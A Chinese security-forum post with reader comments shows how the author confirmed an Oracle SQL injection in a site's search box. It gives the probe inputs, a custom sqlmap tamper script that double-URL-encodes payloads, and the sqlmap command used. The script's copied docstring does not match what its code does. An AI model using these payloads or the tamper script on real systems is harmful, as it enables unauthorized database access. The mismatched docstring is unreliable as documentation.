编写简单tamper绕过encode编码
0x00 环境
遇到 一个搜索框
通过输入以下 内容:
123 返回正常
123%' and '%'=' 返回正常
123%' and '%'=' a 返回 为空
123%‘-- 返回正常
123%' and (select 113 from dual)=123-- 返回正常
初步判定 为 oracle的 搜索型注入
0x01 遇到问题
按照一般的做法截包然后提交给 sqlmap,但是奇怪的sqlmap竟然无法识别出注入点
截包看了下手工注入的数据包,发现%变成了%2525
因此考虑到url编码了
然后查看源码
&classcode="+classcode+"&keyName="+encodeURI(encodeURI(keyName)));0x02 解决问题
查看了下sqlmap自带的tamper,好像还没有针对这种的编码
于是 找了个最简单的 tamper做模板,简单修改了下代码,代码如下
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers ([url]http://sqlmap.org/[/url])
See the file 'doc/COPYING' for copying permission
"""
import re
from urllib import quote
from lib.core.data import kb
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces each keyword character with lower case value
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
* This tamper script should work against all (?) databases
>>> tamper('INSERT')
'insert'
"""
retVal = payload
retVal = quote(quote(retVal))
return retValsqlmap.py -r c:\tmp\1.txt -p keyName --random-agent --tamper urlencode2
sqlmap成功确认为 oracle注入
TCV:5
关于作者
评论11次
学xi了学xi了,这个是用tamper脚本代替了encodeURI的功能呀
我觉得看用的什么过滤或者waf吧,我一般就是自带的就差不多了
好,有参考价值,学xi了
经验判断很准确的样子
学xi了,首先的得手工判断问题出现那儿,然后解决。
sqlmap自带脚本,涵盖的还是有欠缺,自已动手,丰衣足食。
sqlmap全靠那几十个tamper了
赞,学xi咯!
谁能分享下自己写脚本的经验和资料
sqlmap自带的tamper脚本不符合要求吗?
我一般都是自己写python脚本。脚本自带tamper